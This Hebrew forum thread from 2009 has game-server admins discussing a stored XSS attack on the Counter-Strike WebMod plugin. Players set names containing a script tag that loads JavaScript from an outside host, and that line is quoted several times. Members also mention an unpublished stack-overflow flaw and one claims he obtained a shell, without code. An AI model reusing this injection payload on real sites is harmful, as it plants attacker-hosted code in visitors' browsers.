הוסטס - פורום אחסון האתרים הגדול בישראל

הוסטס - פורום אחסון האתרים הגדול בישראל (https://hosts.co.il/forums/index.php)
-   תחזוק שרתים ושירותי רשת נוספים (https://hosts.co.il/forums/forumdisplay.php?f=29)
-   -   בעיה בשרתי משחק (https://hosts.co.il/forums/showthread.php?t=71785)

AmStAf 06-02-09 17:48
בעיה בשרתי משחק
 
שלום ..
לאחרונה יש אנשים שמסתובבים השמות האלו <script/src=//t.zc.cx></scri
בשרתים ופשוט מנשים לכולם את השמות :\
יש לכם אולי פתרון ?

Jonathan Zeierman 06-02-09 19:43
לא הבנתי.
אם אתה רוצה להעיף אותםצ פשוט תעשה:
vote בקונסול.
לכל אחד יש ID משלו למשל:
admin_kick 55

AmStAf 06-02-09 22:21
לא הבנת כי לא נתקלת בהם :\
מה הקשר להעיף ?
יש באג חדש ..
הוא משבש את העמוד הראשי של הוואב מוד
ובמשחק משנה לאנשים את השמות ..
עריכה :
זה נכנס לקונפיג של האנשים ברגע שהם נכנסים לשרת ומדביק להם
לשמל אם הם ילחצו על הבינד 1 / 2 / 3 / כול מיני כאלו
זה ישנה להם את השמות בדרך, זה משבש את האתר .

Jonathan Zeierman 07-02-09 10:18
מה שאתה אומר בעצם שאלו אנשים שאין להם כלל גישות לשרת והם יכולים באיזה סקריפט מסויים לשנות קונפיגים לאנשים?
אם הבנתי אותך תגיד, אם אתה יכול להראות לי כדי אולי לנסות לפענח את הבעיה אתה מוזמן.

AmStAf 07-02-09 11:15
http://212.150.123.11:20012/index.w
זה לדוגמא שרת שיש בו כרגע את השם של הסקריפט ..
הוא משבש את האתר :\
ובמשחק זה כנראה מכניס לאנשים לקונפיג שברגע שהם ילחצו על מקש מסויים זה ישנה להם את השם :\
הבעיה שאני משנה להם את השם במשחק הם לוחצים על המקש וזה משנה להם שוב :\

4EvEr 07-02-09 12:21
לא התעמקתי בפיתרון אבל יש פיתרון פשוט ביותר
תוסיף את הכינוי לדף של האדמינים ככה שהשם שמור לאדמין והופה סודר
<script/src=//t.zc.cx></script>
ככה בדיוק

AmStAf 07-02-09 22:21
הפתירון שלך שנוי במחלוקת :\
אנשים לא יבינו למה הם מקבלים קיקים / לא מצליחים להיכנס ..
אהבתי את דרך החשיבה ש'ך חח

Jonathan Zeierman 07-02-09 22:32
עכשיו הבנתי..
אם זה היה שרת משחק מקורי אני חושב שכל הצרות האלו בכלל לא היו קורות לך :)

AmStAf 08-02-09 07:42
ציטוט:
נכתב במקור על ידי Yoni | Ventrilo.co.il (פרסם 697137)
עכשיו הבנתי..
אם זה היה שרת משחק מקורי אני חושב שכל הצרות האלו בכלל לא היו קורות לך :)
מה הקשר ?
זה גם וגם :\
והיום יש כבר Lan 2 לידיעתך ..
זה קורה גם במקורי, אם הייתי בודק היית יודע .

Jonathan Zeierman 08-02-09 08:41
ציטוט:
נכתב במקור על ידי AmStAf (פרסם 697153)
מה הקשר ?
זה גם וגם :\
והיום יש כבר Lan 2 לידיעתך ..
זה קורה גם במקורי, אם הייתי בודק היית יודע .
כנראה שאתה ממש לא מעודכן, אין כבר lan2, השרתים של המקורי עברו לפרוטוקול 48 והשרתים הפרוצים נשארו ב-47 אני מאוד בטוח שבשרת מקורי זה לא יקרה לך.

AmStAf 08-02-09 15:26
יוני, אתה מדבר עם בנאדם שמתעסק בתחום למעלה מ 3 שנים :\
זה שאתה לא יודע שיש לאן 2 זו בעיתך :]
ואל תיהיה בטוח כי זה בדוק :\
ת'לא משהו הייתי אומר .

omercnet 09-02-09 01:17
הבעייה היא שWEBMOD זה פלאגין דפוק.
יש כל כך הרבה בעיות אבטחה איתו שזה לא נורמאלי.

מה שקורה הוא שמישהו שם טאג בשם שלו, ואז זה מופיע בWEBMOD בלי שום סינון, וזה אומר שאפשר לשתול קוד בעמוד, ולעשות מה שרוצים על השרת.
אני כבר גיליתי את הבעיה הזאת לפני כמה חודשים טובים, לא דיווחתי כי אני יודע שכבר הפסיקו את הפיתוח ואין סיכוי שיוציאו גרסא מתוקנת.
והנה עוד מישהו עלה על זה, ומנצל את זה.

אפשר לעשות דברים הרבה יותר גרועים, אפילו להשתלט על כל הקוספא שעליה מורץ WEBMOD, כבר התרעתי כמה פעמים על הנושא, אני ממליץ לכולם להפסיק להשתמש במוד הזה.

omercnet 09-02-09 01:17
הבעייה היא שWEBMOD זה פלאגין דפוק.
יש כל כך הרבה בעיות אבטחה איתו שזה לא נורמאלי.

מה שקורה הוא שמישהו שם טאג בשם שלו, ואז זה מופיע בWEBMOD בלי שום סינון, וזה אומר שאפשר לשתול קוד בעמוד, ולעשות מה שרוצים על השרת.
אני כבר גיליתי את הבעיה הזאת לפני כמה חודשים טובים, לא דיווחתי כי אני יודע שכבר הפסיקו את הפיתוח ואין סיכוי שיוציאו גרסא מתוקנת.
והנה עוד מישהו עלה על זה, ומנצל את זה.

אפשר לעשות דברים הרבה יותר גרועים, אפילו להשתלט על כל הקוספא שעליה מורץ WEBMOD, כבר התרעתי כמה פעמים על הנושא, אני ממליץ לכולם להפסיק להשתמש במוד הזה.

AmStAf 09-02-09 07:56
אין משהו שאפשר לעשות עם הוואב מוד ?
איזה קוד הגנה ?
או דברים כאלו ?

psycho 11-02-09 18:51
ציטוט:
נכתב במקור על ידי omercnet (פרסם 697331)
הבעייה היא שWEBMOD זה פלאגין דפוק.
יש כל כך הרבה בעיות אבטחה איתו שזה לא נורמאלי.

מה שקורה הוא שמישהו שם טאג בשם שלו, ואז זה מופיע בWEBMOD בלי שום סינון, וזה אומר שאפשר לשתול קוד בעמוד, ולעשות מה שרוצים על השרת.
אני כבר גיליתי את הבעיה הזאת לפני כמה חודשים טובים, לא דיווחתי כי אני יודע שכבר הפסיקו את הפיתוח ואין סיכוי שיוציאו גרסא מתוקנת.
והנה עוד מישהו עלה על זה, ומנצל את זה.

אפשר לעשות דברים הרבה יותר גרועים, אפילו להשתלט על כל הקוספא שעליה מורץ WEBMOD, כבר התרעתי כמה פעמים על הנושא, אני ממליץ לכולם להפסיק להשתמש במוד הזה.
עומר, מלא חולשות פומביות יצאו כבר לפני כמה חודשים טובים,
ההרצת JS וכו' לא פורסמו.. אבל לא היה קשה לגלות
בכל מקרה, עדיין אין אקספלויט פומבי של הרצת קוד עם ה STACK OVERFLOW שיש ב
WEBMOD

אגב, מדובר באופן-סורס אם אני לא טועה, ויצאו כמה פאטצים לא רשמיים ..


מצחיק שמישו כתב תולעת CS זה לא רע דווקא הרעיון..

AmStAf 11-02-09 21:03
ציטוט:
נכתב במקור על ידי psycho (פרסם 697810)
עומר, מלא חולשות פומביות יצאו כבר לפני כמה חודשים טובים,
ההרצת JS וכו' לא פורסמו.. אבל לא היה קשה לגלות
בכל מקרה, עדיין אין אקספלויט פומבי של הרצת קוד עם ה STACK OVERFLOW שיש ב
WEBMOD

אגב, מדובר באופן-סורס אם אני לא טועה, ויצאו כמה פאטצים לא רשמיים ..


מצחיק שמישו כתב תולעת CS זה לא רע דווקא הרעיון..
יש לך הגנות לזה ?
או את הפאצ' ?
אם אתה לא מעוניין לפרסם תוכל לשלוח לי בפרטי ?

omercnet 14-02-09 01:44
ציטוט:
נכתב במקור על ידי psycho (פרסם 697810)
בכל מקרה, עדיין אין אקספלויט פומבי של הרצת קוד עם ה STACK OVERFLOW שיש ב
WEBMOD

כי למזלנו רק ילדים מתעסקים בלהפיל שרתי CS,
ישבתי על זה קצת, והוצאתי SHELL דיי בקלות..


כל הזמנים הם GMT +2. הזמן כעת הוא 05:51.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ